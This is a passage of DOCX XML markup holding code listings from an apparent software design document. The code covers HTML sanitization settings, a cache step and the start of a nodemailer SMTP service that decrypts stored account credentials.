          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</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setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cacheKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3600</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(result))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// TTL 1 hora</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lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">release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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(html</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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>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'br'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'strong'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'em'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'u'</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'img'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'table'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tr'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'td'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'th'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'thead'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tbody'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ul'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ol'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'li'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h5'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h6'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blockquote'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pre'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'span'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'div'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedAttributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'href'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'title'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        img</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'alt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'width'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'height'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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'style'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allowedSchemes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'http'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'https'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mailto'</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183"/>
    <w:bookmarkStart w:id="184" w:name="smtp-service"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2.5 SMTP Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/smtp.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodemailer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { AuthService } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./auth.js'</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AccountDoc } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../types/index.js'</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SmtpService {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> transporters</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nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Transporter</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getTransporter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc)</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nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Transporter</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account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</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transporters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(key)) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">decryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsEncrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsIv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsTag</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transporter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createTransport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        pool</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host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtpHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtpPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
